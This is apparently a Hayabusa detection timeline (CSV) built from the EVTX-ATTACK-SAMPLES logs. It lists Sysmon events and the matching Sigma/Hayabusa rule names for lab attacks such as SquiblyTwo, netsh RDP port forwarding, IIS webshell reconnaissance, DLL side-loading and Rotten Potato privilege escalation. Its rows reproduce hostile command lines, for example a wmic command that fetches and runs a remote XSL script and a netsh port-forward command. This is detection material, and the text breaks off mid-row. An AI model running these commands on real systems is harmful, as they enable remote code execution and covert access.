2019-05-22 00:33:00.140 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49704 (IEWIN7..home) | Dst: 105.73.6.112:80 (aka112.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:33:01.141 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49705 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 13:02:11.307 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2 | LID: 0xf05d | PID: 2888 | PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
2019-05-22 13:02:11.307 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Program Files\Internet Explorer\iexplore.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3156 | Src PGUID: 365ABB72-C9C1-5CE4-0000-00100B222E00 | Tgt PID: 2888 | Tgt PGUID: 365ABB72-C9C3-5CE4-0000-00101F422E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,info,,Process Created,"Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.862 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,../hayabusa-rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx 2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx 2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 
365ABB72-0FA6-5CEA-0000-001049B50A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | 
Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx 2019-05-27 
00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 
365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: 
C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,../hayabusa-rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx 2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network 